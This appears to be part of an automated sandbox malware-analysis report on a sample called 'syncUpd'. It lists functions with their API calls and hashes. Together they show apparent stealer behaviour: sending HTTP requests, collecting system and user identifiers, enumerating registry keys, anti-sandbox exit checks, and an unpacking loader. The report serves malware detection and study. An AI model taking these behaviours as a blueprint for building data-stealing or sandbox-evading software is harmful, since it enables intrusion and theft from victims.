                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d17a967b76ce1ee735f1f47082f8f9b027be3ac0b8b0cfcc2167a6bfdfd9e736
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00404540 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479networkstringfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 530 404540-404602 call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 545 404604 530->545 546 40460b-40460f 530->546 545->546 547 404615-40478d call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 546->547 548 404b8b-404bb3 InternetCloseHandle call 4170d0 call 4094a0 546->548 547->548 634 404793-404797 547->634 558 404bf2-404c62 call 415070 * 2 call 416da0 call 416e00 * 8 548->558 559 404bb5-404bed call 416e20 call 416fb0 call 416ea0 call 416e00 548->559 559->558 635 4047a5 634->635 636 404799-4047a3 634->636 637 4047af-4047e2 HttpOpenRequestA 635->637 636->637 638 4047e8-404ae8 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416d40 call 416f20 * 2 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 * 2 lstrlen call 4170d0 HttpSendRequestA 637->638 639 404b7e-404b85 InternetCloseHandle 637->639 750 404af2-404b1c InternetReadFile 638->750 639->548 751 404b27-404b79 InternetCloseHandle call 416e00 750->751 752 404b1e-404b25 750->752 751->639 752->751 753 404b29-404b67 call 416fb0 call 416ea0 call 416e00 752->753 753->750
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095DC90), ref: 004045FA
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,0095DC40), ref: 00404AA8
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B6D
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B85
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,0095DC20,?,00965658,00000000,00000000,00400100,00000000), ref: 004047D5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B8F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                                                                                                              • String ID: "$"$------$------$------$8me
                                                                                                                                                                                                                                                              • API String ID: 460715078-2873308080
                                                                                                                                                                                                                                                              • Opcode ID: 879f56fd817f8a8f66353b252f5d0a865072bf09ff82b57927e01de9d3cd6eeb
                                                                                                                                                                                                                                                              • Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 879f56fd817f8a8f66353b252f5d0a865072bf09ff82b57927e01de9d3cd6eeb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179registryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,009620A8,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                                                                                                                                                                              • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                              • API String ID: 3246050789-3278919252
                                                                                                                                                                                                                                                              • Opcode ID: 8debdc7a5708c493459ae8adcdded4386842cb9c270a7d87b6ae7233fe7e035b
                                                                                                                                                                                                                                                              • Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8debdc7a5708c493459ae8adcdded4386842cb9c270a7d87b6ae7233fe7e035b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004142DD
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                                                                                                              • String ID: :$C$\
                                                                                                                                                                                                                                                              • API String ID: 3790021787-3809124531
                                                                                                                                                                                                                                                              • Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                                              • Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,00964718,00000000,?,0041D774,00000000,?,00000000,00000000,?,00964778), ref: 0041496D
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                              • String ID: %d MB$@
                                                                                                                                                                                                                                                              • API String ID: 2886426298-3474575989
                                                                                                                                                                                                                                                              • Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                                                              • Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 860 8f003c-8f0047 861 8f004c-8f0263 call 8f0a3f call 8f0e0f call 8f0d90 VirtualAlloc 860->861 862 8f0049 860->862 877 8f028b-8f0292 861->877 878 8f0265-8f0289 call 8f0a69 861->878 862->861 880 8f02a1-8f02b0 877->880 882 8f02ce-8f03c2 VirtualProtect call 8f0cce call 8f0ce7 878->882 880->882 883 8f02b2-8f02cc 880->883 889 8f03d1-8f03e0 882->889 883->880 890 8f0439-8f04b8 VirtualFree 889->890 891 8f03e2-8f0437 call 8f0ce7 889->891 893 8f04be-8f04cd 890->893 894 8f05f4-8f05fe 890->894 891->889 896 8f04d3-8f04dd 893->896 897 8f077f-8f0789 894->897 898 8f0604-8f060d 894->898 896->894 902 8f04e3-8f0505 LoadLibraryA 896->902 900 8f078b-8f07a3 897->900 901 8f07a6-8f07b0 897->901 898->897 903 8f0613-8f0637 898->903 900->901 904 8f086e-8f08be LoadLibraryA 901->904 905 8f07b6-8f07cb 901->905 906 8f0517-8f0520 902->906 907 8f0507-8f0515 902->907 908 8f063e-8f0648 903->908 912 8f08c7-8f08f9 904->912 909 8f07d2-8f07d5 905->909 910 8f0526-8f0547 906->910 907->910 908->897 911 8f064e-8f065a 908->911 913 8f07d7-8f07e0 909->913 914 8f0824-8f0833 909->914 915 8f054d-8f0550 910->915 911->897 916 8f0660-8f066a 911->916 918 8f08fb-8f0901 912->918 919 8f0902-8f091d 912->919 920 8f07e4-8f0822 913->920 921 8f07e2 913->921 917 8f0839-8f083c 914->917 922 8f0556-8f056b 915->922 923 8f05e0-8f05ef 915->923 924 8f067a-8f0689 916->924 917->904 925 8f083e-8f0847 917->925 918->919 920->909 921->914 928 8f056f-8f057a 922->928 929 8f056d 922->929 923->896 926 8f068f-8f06b2 924->926 927 8f0750-8f077a 924->927 932 8f084b-8f086c 925->932 933 8f0849 925->933 934 8f06ef-8f06fc 926->934 935 8f06b4-8f06ed 926->935 927->908 930 8f057c-8f0599 928->930 931 8f059b-8f05bb 928->931 929->923 943 8f05bd-8f05db 930->943 931->943 932->917 933->904 937 8f06fe-8f0748 934->937 938 8f074b 934->938 935->934 937->938 938->924 943->915
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 008F024D
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                              • Instruction ID: 2f5da39f9660e2635b7f9a5d6ff00d7d5a8da7f531bdff6610be31206e02b5b0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40526974A01229DFDB64CF68C984BA8BBB1BF09304F1480D9E54DAB352DB30AE95DF15
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004136B0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,00941180), ref: 00415F11
                                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,00941198), ref: 00415F2A
                                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,00941360), ref: 00415F42
                                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,009413A8), ref: 00415F5A
                                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,00941390), ref: 00415F73
                                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,0095C7E0), ref: 00415F8B
                                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,0095C0D8), ref: 00415FA3
                                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,0095C098), ref: 00415FBC
                                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,00941378), ref: 00415FD4
                                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,009413C0), ref: 00415FEC
                                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,009413D8), ref: 00416005
                                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,009413F0), ref: 0041601D
                                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,0095BD78), ref: 00416035
                                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,00941408), ref: 0041604E
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1
                                                                                                                                                                                                                                                                • Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                                                                • Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                                                                • Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                                                • Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                                                • Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                                                • Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                                                • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                                                • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                                                • Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                                                • Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
                                                                                                                                                                                                                                                              • GetUserDefaultLangID.KERNEL32 ref: 004136E6
                                                                                                                                                                                                                                                                • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,0095DA10,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0095C850,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,0095C850,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1125299040-0
                                                                                                                                                                                                                                                              • Opcode ID: 6c85d108d3fdb6cf77c2a5a42fa03fa3f94c77551ea5e880e5838d95f1ce7655
                                                                                                                                                                                                                                                              • Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c85d108d3fdb6cf77c2a5a42fa03fa3f94c77551ea5e880e5838d95f1ce7655
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,00964670,00000000,000F003F,?,00000400), ref: 00414C89
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00414C9E
